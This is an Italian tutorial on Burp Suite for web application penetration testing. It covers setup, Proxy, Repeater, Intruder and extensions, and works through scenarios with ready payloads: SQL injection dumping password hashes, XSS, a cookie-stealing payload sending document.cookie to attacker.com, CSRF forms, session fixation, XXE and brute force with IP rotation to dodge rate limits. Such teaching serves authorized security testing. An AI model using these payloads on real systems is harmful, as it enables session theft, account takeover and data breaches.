web-hacking

Burp Suite: Guida Completa per Web Application Penetration Testing

Burp Suite: Guida Completa per Web Application Penetration Testing

Burp Suite guida pratica al web application penetration testing: Proxy, Repeater, Intruder, SQLi, XSS, CSRF e API exploitation reali.

  • Pubblicato il 2026-02-05
  • Tempo di lettura: 10 min

Burp Suite: Guida Completa per Web Application Penetration Testing #

Burp Suite è lo strumento indispensabile per penetration testing di applicazioni web. Sviluppato da PortSwigger, Burp Suite è l’intercepting proxy più usato al mondo dai security researcher per trovare vulnerabilità in web app moderne.

Quando devi testare autenticazione, scoprire SQL injection, identificare XSS, manipolare sessioni o analizzare API, Burp Suite è il tuo laboratorio completo. In questa guida impari a usare Burp Suite come un professionista: da configurazione base a exploitation avanzata con tecniche reali di penetration testing.

Cos’è Burp Suite e Perché Usarlo #

Burp Suite è una piattaforma integrata per security testing di applicazioni web. Funziona come proxy HTTP/S tra browser e server, permettendoti di intercettare, analizzare e modificare traffico in tempo reale.

Componenti principali:

  • Proxy: Intercetta e modifica richieste/risposte HTTP/S
  • Repeater: Ripete e modifica richieste manualmente
  • Intruder: Automatizza attacchi (fuzzing, brute force)
  • Scanner: Identifica vulnerabilità automaticamente (Pro)
  • Decoder: Encoding/decoding (Base64, URL, hex)
  • Comparer: Confronta risposte per identificare differenze
  • Sequencer: Analizza qualità token randomness
  • Extensions: Marketplace con centinaia di plugin

Burp Suite Community vs Professional:

FeatureCommunity (Free)Professional
Proxy intercept
Repeater
Intruder✓ (limitato)✓ (veloce)
Scanner
Extensions
Save/Restore state
Active scan
Report generation

Prezzo Professional: ~$449/anno per utente

Per imparare usa Community Edition. Per penetration testing professionale, Pro è necessario per Scanner e Intruder veloce.

Installazione e Setup Burp Suite #

Installazione su Kali Linux #

bash
# Burp Community già incluso in Kali
burpsuite

# Oppure scarica Pro da PortSwigger
wget https://portswigger.net/burp/releases/download?product=pro&version=latest&type=Linux
chmod +x burpsuite_pro_linux_*.sh
./burpsuite_pro_linux_*.sh

Installazione su Windows/Mac #

  1. Scarica installer da https://portswigger.net/burp/communitydownload
  2. Esegui installer (richiede Java JDK)
  3. Avvia Burp Suite

First Launch Configuration #

Al primo avvio:

  1. Start Burp
  2. “Temporary project” (Community) oppure “New project” (Pro)
  3. “Use Burp defaults”
  4. Click “Start Burp”

Burp Proxy default: 127.0.0.1:8080

Configurazione Browser #

Firefox (consigliato per pentest):

  1. Settings → Network Settings → Manual proxy configuration
  2. HTTP Proxy: 127.0.0.1 Port: 8080
  3. Check “Also use this proxy for HTTPS”
  4. No proxy for: (vuoto)

Oppure usa FoxyProxy extension:

  1. Installa FoxyProxy Standard
  2. Add proxy: 127.0.0.1:8080
  3. Nome: “Burp Suite”
  4. Attiva/disattiva con un click

Installazione Certificato CA #

Per intercettare HTTPS devi installare certificato Burp:

Step:

  1. Avvia Burp e proxy browser
  2. Naviga a: http://burpsuite
  3. Click “CA Certificate” → Download
  4. Firefox: Settings → Privacy & Security → Certificates → View Certificates
  5. Import → Seleziona burp-ca.crt
  6. Check “Trust this CA to identify websites”

Verifica: Naviga a https://google.com - se vedi traffico in Burp Proxy, setup completato.

Burp Proxy: Intercept e Analisi Traffico #

Intercept Mode Base #

Scenario: Devi analizzare richiesta login per identificare parametri.

  1. Burp → Proxy → Intercept → Intercept is ON
  2. Browser → Vai a https://target.com/login
  3. Inserisci: username=admin, password=test123
  4. Submit form
  5. Burp intercetta richiesta PRIMA di inviarla al server

Richiesta interceptata:

http
POST /login HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Cookie: session=abc123xyz

username=admin&password=test123

Azioni possibili:

  • Forward: Invia richiesta al server
  • Drop: Elimina richiesta (non inviata)
  • Action → Do intercept → Response to this request: Intercetta anche risposta
  • Modifica manualmente parametri prima di Forward

Modifica Richiesta in Real-Time #

Esempio - Parameter Tampering:

http
# Richiesta originale
POST /api/user/update HTTP/1.1
Host: target.com

user_id=123&role=user&email=test@test.com

# Modifica in Burp:
user_id=123&role=admin&email=test@test.com

# Forward → Se app non valida server-side, diventi admin!

Esempio - Session Hijacking:

http
# Intercetta richiesta
GET /profile HTTP/1.1
Cookie: session=abc123

# Sostituisci con session ID rubato
Cookie: session=xyz789admin

# Forward → Accedi come altro utente

HTTP History #

Tutte le richieste passano per Proxy → HTTP History (anche con Intercept OFF).

Filtri utili:

  1. Proxy → HTTP history
  2. Filter → Show only in-scope items (riduce noise)
  3. Filter → Hide CSS/images/etc (focus su API/endpoints)
  4. Cerca parametri interessanti: session, token, api_key, debug

Uso pratico:

  1. Naviga applicazione normalmente (Intercept OFF)
  2. Esplora tutte le funzionalità
  3. In HTTP history, analizza chiamate API
  4. Identifica endpoint interessanti per testing
  5. Send to Repeater per manual testing

Repeater: Manual Request Testing #

Repeater permette di inviare stessa richiesta ripetutamente modificando parametri.

Uso Base Repeater #

  1. Proxy → HTTP history → Click richiesta interessante
  2. Right-click → Send to Repeater
  3. Repeater tab → Modifica richiesta
  4. Click “Send”
  5. Analizza response

Esempio - SQLi Testing:

Richiesta originale:

http
GET /product?id=5 HTTP/1.1
Host: target.com

Test SQLi in Repeater:

http
# Test 1: Single quote
GET /product?id=5' HTTP/1.1

# Response: SQL error → Vulnerable!

# Test 2: UNION injection
GET /product?id=5 UNION SELECT NULL,username,password FROM users-- HTTP/1.1

# Response: Database dump

Esempio - XSS Testing:

http
# Richiesta POST form search
POST /search HTTP/1.1
Content-Type: application/x-www-form-urlencoded

query=test

# Test XSS payloads:
query=<script>alert(1)</script>
query=<img src=x onerror=alert(1)>
query="><svg/onload=alert(1)>

Analizza response per vedere se payload riflesso senza sanitizzazione.

Repeater Tabs e Organization #

text
# Rinomina tabs per organizzazione
Right-click tab → Rename → "SQLi Product ID"
Right-click tab → Rename → "XSS Search Field"

# Colora richieste per priorità
Right-click request → Highlight → Red (high priority)

Response Analysis #

Panel response Repeater:

  • Raw: HTTP response completo
  • Headers: Solo headers response
  • Hex: View in hex (per binary content)
  • Render: Renderizza HTML (preview come browser)

Cosa cercare:

  • Error messages (SQL errors, stack traces)
  • Reflected input (XSS)
  • Sensitive data (API keys, tokens, credentials)
  • Different response codes
  • Response size/timing differences (blind injection indicators)

Intruder: Automated Attacks #

Intruder automatizza fuzzing e brute force. Nota: Community Edition è throttled (lento), Professional è veloce.

Attack Types #

TypeDescrizioneUso
SniperUn payload alla volta, singola positionUsername enum, parameter fuzzing
Battering ramStesso payload in tutte positionsTest stesso valore ovunque
PitchforkPayload diversi in positions (parallelo)Username+password da liste paired
Cluster bombTutte combinazioni tra payload setsBrute force completo user+pass

Sniper Attack - Username Enumeration #

Scenario: Identifica username validi da response differente.

  1. Intercetta richiesta login
  2. Send to Intruder
  3. Intruder → Positions → Clear § (rimuovi markers auto)
  4. Seleziona solo username → Add § → username=§admin§
  5. Payloads → Load usernames.txt
  6. Start attack

Richiesta template:

http
POST /login HTTP/1.1

username=§admin§&password=wrongpass

Analizza risultati:

PayloadStatusLengthResponse
admin2001523Invalid password
root2001523Invalid password
test2001421User not found
john2001523Invalid password

Conclusione: Username validi hanno Length 1523 (“Invalid password”), invalidi hanno 1421 (“User not found”).

Cluster Bomb - Password Brute Force #

Scenario: Brute force login con username e password da wordlist.

  1. Intruder → Positions
  2. Attack type: Cluster bomb
  3. Set positions: username=§user§&password=§pass§
  4. Payload set 1 (username): Load users.txt
  5. Payload set 2 (password): Load passwords.txt
  6. Start attack

Genera tutte combinazioni:

text
admin:password123
admin:admin
admin:123456
user:password123
user:admin
...

Identifica successo:

  • Status 302 (redirect post-login)
  • Diversa response length
  • Presenza “Welcome” in response

Intruder Payloads Customization #

Payload processing:

text
Intruder → Payloads → Payload Processing

- Add prefix: admin_
- Add suffix: _2024
- Case modification: Uppercase first char
- Encode: URL-encode
- Hash: MD5/SHA256

Esempio:

Input wordlist: password Processing: Uppercase first + Add suffix _2024 Output: Password_2024

Grep Extract #

Estrai dati specifici da responses:

  1. Intruder → Options → Grep - Extract
  2. Load sample response
  3. Seleziona token/data da estrarre
  4. OK

Uso: Estrarre CSRF token da ogni response per attacchi stateful.

Scanner: Automated Vulnerability Discovery (Pro Only) #

Scanner automatico identifica vulnerabilità comuni. Solo Burp Professional.

Passive Scan #

Scanner passivo analizza traffico Proxy senza inviare richieste aggiuntive.

Identifica:

  • Sensitive data in responses (password, API keys)
  • Missing security headers (CSP, HSTS, X-Frame-Options)
  • Cookie insicuri (no HttpOnly, no Secure)
  • Information disclosure

Sempre attivo in background.

Active Scan #

Active scan invia payloads per testare vulnerabilità.

Uso:

  1. Proxy → HTTP history → Right-click richiesta
  2. Do active scan
  3. Scan queue → Monitor progress
  4. Dashboard → View issues found

Vulnerabilità testate:

  • SQL Injection
  • XSS (reflected, stored, DOM)
  • CSRF
  • XXE (XML External Entity)
  • SSRF (Server-Side Request Forgery)
  • Path traversal
  • Command injection
  • Deserialization
  • Open redirects

Scan Configuration #

text
Scanner → Scan configuration

- Crawl strategy: Normal / Fast / Thorough
- Audit optimization: Fast / Normal / Thorough
- Issues reported: All / Certain confidence

Best practice:

  • Scan limitato: Fast scan su ampio scope
  • Scan approfondito: Thorough su endpoints critici
  • Combina: Passive always ON + Active selettivo

Extensions: Potenziare Burp Suite #

Burp Extender marketplace ha centinaia di plugin essenziali.

Extensions Must-Have #

Installazione:

text
Extender → BApp Store → Search → Install

Top Extensions:

ExtensionFunzione
Logger++Advanced logging, ricerca, filtri
AutorizeTesta authorization/access control
Turbo IntruderIntruder più veloce con script Python
Upload ScannerTesta upload vulnerabilità
Active Scan++Scan aggiuntivi (SSRF, template injection)
Param MinerScopre parametri nascosti
JWT EditorManipola JSON Web Token
Retire.jsIdentifica librerie JS vulnerabili
Software Vulnerability ScannerCVE identification
Collaborator EverywhereSSRF/XXE detection avanzata

Logger++ Setup #

Dopo installazione:

  1. Logger++ tab
  2. Configure columns (URL, Method, Status, Length, Response time)
  3. Filter expressions (advanced search)
  4. Export to CSV per reporting

Advanced filter example:

text
# Mostra solo POST con response >5000 bytes
Request.Method == "POST" && Response.Length > 5000

# Mostra solo errori 500
Status == 500

# Mostra solo JSON responses
Response.Headers CONTAINS "application/json"

Autorize - Testing Access Control #

Scenario: Verifica se user standard può accedere a funzioni admin.

  1. Installa Autorize extension
  2. Autorize tab → Get cookie di utente LOW privilege
  3. Naviga app come utente HIGH privilege
  4. Autorize testa automaticamente ogni richiesta con LOW cookie
  5. Identifica access control failures (response identica = vulnerable)

Output:

URLHigh PrivLow PrivStatus
/admin/users200200FAIL - No access control
/api/delete200403OK - Access denied

Turbo Intruder - Advanced Fuzzing #

Intruder Python-scriptable, molto più veloce di Intruder standard.

Uso:

  1. Send request to Turbo Intruder
  2. Modifica script Python
  3. Run

Script esempio - Race condition:

python
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                          concurrentConnections=30)
    
    # Invia 100 richieste simultanee
    for i in range(100):
        engine.queue(target.req, gate='race1')
    
    # Release tutte insieme
    engine.openGate('race1')

Utile per race condition, bypass rate limiting, concurrency issues.

Scenari Pratici Penetration Testing #

Scenario 1: SQL Injection Discovery ed Exploitation #

Obiettivo: Trovare e sfruttare SQLi in parametro GET.

Step 1: Identificazione

Step 2: Test basic SQLi

http
GET /product?id=5' HTTP/1.1

Response: SQL syntax error → Vulnerable

Step 3: Identifica numero colonne

http
GET /product?id=5 ORDER BY 1-- HTTP/1.1  → OK
GET /product?id=5 ORDER BY 2-- HTTP/1.1  → OK
GET /product?id=5 ORDER BY 3-- HTTP/1.1  → OK
GET /product?id=5 ORDER BY 4-- HTTP/1.1  → Error

→ 3 colonne

Step 4: UNION exploitation

http
GET /product?id=-1 UNION SELECT NULL,username,password FROM users-- HTTP/1.1

Response:

text
username: admin
password: 5f4dcc3b5aa765d61d8327deb882cf99 (MD5 hash)

Step 5: Cracka hash con Hashcat

bash
echo "5f4dcc3b5aa765d61d8327deb882cf99" > hash.txt
hashcat -m 0 hash.txt rockyou.txt

→ password: password

Step 6: Login con admin:password

Per exploitation automatica usa SQLMap con request file da Burp.

Scenario 2: XSS Discovery e Weaponization #

Obiettivo: Trovare XSS reflected e rubare session cookie.

Step 1: Identifica reflection point

Step 2: Test XSS payloads

http
GET /search?q=<script>alert(1)</script> HTTP/1.1

Response: <h1>Results for <script>alert(1)</script></h1> → Payload riflesso, ma <script> strippato

Step 3: Bypass filter

http
GET /search?q=<img src=x onerror=alert(1)> HTTP/1.1

Response: <h1>Results for <img src=x onerror=alert(1)></h1> → Executed!

Step 4: Cookie stealer payload

http
GET /search?q=<img src=x onerror=fetch('https://attacker.com/steal?c='+document.cookie)> HTTP/1.1

Step 5: URL encode e invia a vittima

text
https://target.com/search?q=%3Cimg+src%3Dx+onerror%3Dfetch%28%27https%3A%2F%2Fattacker.com%2Fsteal%3Fc%3D%27%2Bdocument.cookie%29%3E

Step 6: Attacker server riceve:

text
GET /steal?c=session=abc123xyz456

Vedi XSS Advanced per payloads completi.

Scenario 3: CSRF Token Bypass #

Obiettivo: Bypass CSRF protection ed esegui azione privilegiata.

Step 1: Analizza richiesta legittima

http
POST /account/change-email HTTP/1.1
Content-Type: application/x-www-form-urlencoded

email=new@test.com&csrf_token=abc123xyz

Step 2: Send to Repeater, rimuovi CSRF token

http
POST /account/change-email HTTP/1.1

email=new@test.com

Response: 200 OK, email changed! → CSRF token non validato!

Step 3: Crafta CSRF attack HTML

html
<html>
<body>
<form action="https://target.com/account/change-email" method="POST">
<input type="hidden" name="email" value="attacker@evil.com">
<input type="submit" value="Click here for prize!">
</form>
</body>
</html>

Step 4: Host su attacker.com, invia link a vittima

Step 5: Vittima clicca → Email cambiata senza consenso

Scenario 4: API Authentication Bypass #

Obiettivo: Bypassare autenticazione API testando diversi metodi HTTP.

Step 1: Request normale (autenticata)

http
GET /api/admin/users HTTP/1.1
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...

Response: 200 OK, lista users

Step 2: Rimuovi Authorization header

http
GET /api/admin/users HTTP/1.1

Response: 401 Unauthorized

Step 3: Test altri metodi HTTP

http
HEAD /api/admin/users HTTP/1.1

Response: 200 OK (headers only, no body) → Bypass parziale

http
OPTIONS /api/admin/users HTTP/1.1

Response: 200 OK, CORS headers exposed

Step 4: Test HTTP verb tampering

http
POST /api/admin/users HTTP/1.1
X-HTTP-Method-Override: GET

Response: 200 OK, lista users senza auth! → Vulnerable!

Vedi API Hacking per tecniche complete.

Scenario 5: Session Fixation Attack #

Obiettivo: Fixare session ID vittima per session hijacking.

Step 1: Ottieni session ID

http
GET / HTTP/1.1

Response:

text
Set-Cookie: PHPSESSID=attacker_controlled_123

Step 2: Verifica se app accetta session ID arbitrario

http
GET / HTTP/1.1
Cookie: PHPSESSID=attacker_controlled_123

Response: 200 OK → Session ID accettato!

Step 3: Invia link a vittima con session ID fixato

text
https://target.com/?PHPSESSID=attacker_controlled_123

Step 4: Vittima fa login con session fixata

Step 5: Attacker usa stesso session ID

http
GET /profile HTTP/1.1
Cookie: PHPSESSID=attacker_controlled_123

→ Logged in as victim!

Burp Collaborator: Out-of-Band Attacks #

Burp Collaborator è server PortSwigger per rilevare vulnerabilità blind (SSRF, XXE, DNS exfiltration).

Uso Collaborator #

  1. Burp menu → Burp Collaborator client
  2. “Copy to clipboard” → Ottieni subdomain unico (es: abc123.burpcollaborator.net)
  3. Usa in payloads

Esempio - Blind SSRF:

http
POST /api/webhook HTTP/1.1

url=http://abc123.burpcollaborator.net

Collaborator client mostra:

text
DNS lookup: abc123.burpcollaborator.net
HTTP request: GET / 
Source IP: 10.0.0.50 (internal IP del server target!)
→ SSRF confirmed

Esempio - XXE Data Exfiltration:

xml
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "http://abc123.burpcollaborator.net/xxe">
%xxe;
]>

Collaborator riceve richiesta → XXE vulnerability confirmed.

Decoder e Comparer #

Decoder #

Tool per encoding/decoding rapido.

text
Decoder tab → Paste data

Decode as:
- URL
- HTML
- Base64
- Hex
- ASCII hex
- Gzip
- JWT

Encode as:
- (stessi formati)

Esempio pratico:

Cookie interceptato: dXNlcj1hZG1pbjtyb2xlPXVzZXI%3D

  1. Decoder → Decode as URL: dXNlcj1hZG1pbjtyb2xlPXVzZXI=
  2. Decoder → Decode as Base64: user=admin;role=user
  3. Modifica: user=admin;role=admin
  4. Encoder → Base64: dXNlcj1hZG1pbjtyb2xlPWFkbWlu
  5. Encoder → URL: dXNlcj1hZG1pbjtyb2xlPWFkbWlu%3D
  6. → Usa nuovo cookie in richiesta

Comparer #

Confronta due risposte per identificare differenze minime.

  1. Repeater → Send richiesta 1 → Right-click response → Send to Comparer
  2. Modifica richiesta → Send richiesta 2 → Send to Comparer
  3. Comparer tab → Compare (words/bytes)

Uso pratico:

Request 1: /user?id=1 → Response A Request 2: /user?id=2 → Response B

Comparer evidenzia:

  • Bytes differenti (user data changed)
  • Timing differences (SQL injection blind timing-based)
  • Response length variations

Utile per blind SQLi, user enumeration, behavior analysis.

Scope e Target Management #

Definire Scope #

Focus testing su target specifici.

  1. Target → Scope → Add
  2. Protocol: https
  3. Host: target.com
  4. File: ^/api/.*$ (regex, solo /api/)

Benefici:

  • Proxy intercetta solo in-scope items
  • Scanner testa solo scope
  • Riduce noise da CDN, analytics, ads

Site Map #

text
Target → Site map

Mostra:
- Struttura completa applicazione scoperta
- Endpoints testati
- Issues trovati per path

Funzionalità:

text
Right-click branch → Engagement tools:
- Spider this branch
- Active scan
- Compare site maps
- Discover content (forced browsing)

Discover content usa wordlist integrata per trovare directory/file non linkati.

Troubleshooting e Best Practices #

Certificate Errors Persistenti #

Problema: Browser ancora mostra certificate warnings.

Fix:

  1. Verifica certificato Burp installato correttamente
  2. Firefox: about:config → security.enterprise_roots.enabled → true
  3. Chrome/Chromium: Aggiungi flag –ignore-certificate-errors (SOLO per testing)
  4. Restart browser completamente

Burp Non Intercetta Traffico #

Checklist:

  • Proxy configurato in browser (127.0.0.1:8080)
  • Intercept is ON in Burp
  • Burp effettivamente in ascolto (Proxy → Options → Running)
  • Firewall non blocca localhost:8080
  • Certificato CA installato per HTTPS

Performance Optimization #

bash
# Aumenta memoria Java per Burp
java -jar -Xmx4g burpsuite.jar

In Burp:

  • Scanner → Live passive scanning → Paused (se non serve)
  • Proxy → Options → Miscellaneous → Maximum items in Proxy history: 1000

Integration con ffuf/SQLMap #

Burp → ffuf:

bash
# Esporta richiesta da Burp
Right-click request → Copy as curl command

# Converti in ffuf format
ffuf -request burp_request.txt -w wordlist.txt

Burp → SQLMap:

bash
# Salva richiesta in file
Right-click → Save item → request.txt

# SQLMap testing
sqlmap -r request.txt --batch --level 3 --risk 2

Vedi ffuf Guide per directory fuzzing integration.

Tabella Vulnerabilità vs Burp Tool #

VulnerabilitàTool Burp PrimarioTool SecondarioAutomated (Pro)
SQL InjectionRepeaterIntruderScanner
XSS (Reflected)RepeaterIntruderScanner
XSS (Stored)Repeater-Scanner
CSRFRepeater-Scanner (partial)
SSRFRepeater + Collaborator-Scanner + Active Scan++
XXERepeater + Collaborator-Scanner
Path TraversalIntruderRepeaterScanner
Authentication BypassRepeaterIntruder-
Authorization FlawsAutorize extensionRepeater-
Sensitive Data ExposureProxy + Logger++-Passive Scanner
Insecure DeserializationRepeater-Scanner
Command InjectionRepeaterIntruderScanner
Open RedirectRepeaterIntruderScanner
Session FixationRepeater--
Race ConditionsTurbo Intruder--

FAQ Burp Suite #

Burp Community è sufficiente per imparare?

Sì, assolutamente. Community ha Proxy, Repeater, Intruder (limitato) ed Extender - sufficienti per imparare basi. Scanner automatico e Intruder veloce richiedono Pro, ma per manual testing Community è ottimo.

Come velocizzare Intruder in Community?

Intruder Community è throttled intenzionalmente. Alternative:

  • Turbo Intruder extension (veloce, richiede Python scripting)
  • ffuf per fuzzing veloce esterno
  • Passa a Burp Professional

Burp può testare mobile app?

Sì. Configura proxy sul dispositivo mobile:

  1. Device: WiFi settings → Manual proxy → IP_KALI:8080
  2. Installa certificato Burp su mobile
  3. Intercetta traffico app normalmente

Per app con certificate pinning serve Frida/objection bypass.

Come salvare stato progetto in Community?

Community non supporta save/restore. Workaround:

  • Esporta items manualmente (Right-click → Save items)
  • Usa Logger++ per logging persistente
  • Screenshot/note di findings critici

Professional supporta project save/load completo.

Burp rileva automaticamente tutte le vulnerabilità?

No. Scanner Pro trova molte vulnerabilità comuni ma:

  • Business logic flaws richiedono manual testing
  • Complex authentication bypasses richiedono creatività
  • Race conditions richiedono test manuali
  • Authorization issues richiedono Autorize extension + manual verification

Burp è strumento, non sostituto del pentester.

Posso usare Burp per testing API GraphQL?

Sì. Burp intercetta GraphQL queries normalmente. Extension consigliate:

  • InQL Scanner (GraphQL introspection)
  • GraphQL Raider

Vedi GraphQL Security per tecniche specifiche.

Come gestire rate limiting durante Intruder?

text
Intruder → Options → Request Engine:
- Number of threads: 1-5 (lento)
- Delay between requests: 1000ms (1 secondo)
- Throttle: 50 requests/minute

Oppure:
- Usa session handling per refresh token
- Rotate IP con proxy
- Spread attack su tempo lungo

Supporta HackIta e Testa la Tua Sicurezza #

Se questa guida ti è stata utile, considera di supportare HackIta:

💰 Supporto: Contribuisci allo sviluppo di contenuti gratuiti su cybersecurity visitando hackita.it/supporto - ogni donazione aiuta a creare guide sempre più approfondite.

🔒 Servizi Professionali: Vuoi testare la sicurezza della tua azienda, sito web o applicazione? HackIta offre servizi professionali di penetration testing e security assessment. Scopri di più su hackita.it/servizi per migliorare la postura di sicurezza della tua organizzazione.


Link Utili:

Disclaimer Legale: Burp Suite è tool legale per security testing autorizzato. L’utilizzo su applicazioni web senza esplicito consenso scritto del proprietario costituisce reato penale (accesso abusivo a sistema informatico, art. 615-ter c.p.). Usa solo su sistemi di tua proprietà o in contesto di penetration test formalmente autorizzato con scope e regole di engagement definite.

#burp suite #web fuzzing #web hacking

DIVENTA PARTE DELL’ÉLITE DELL’HACKING ETICO.

Accedi a risorse avanzate, lab esclusivi e strategie usate dai veri professionisti della cybersecurity.

Non sono un robot

Iscrivendoti accetti di ricevere la newsletter di HACKITA. Ti puoi disiscrivere in qualsiasi momento.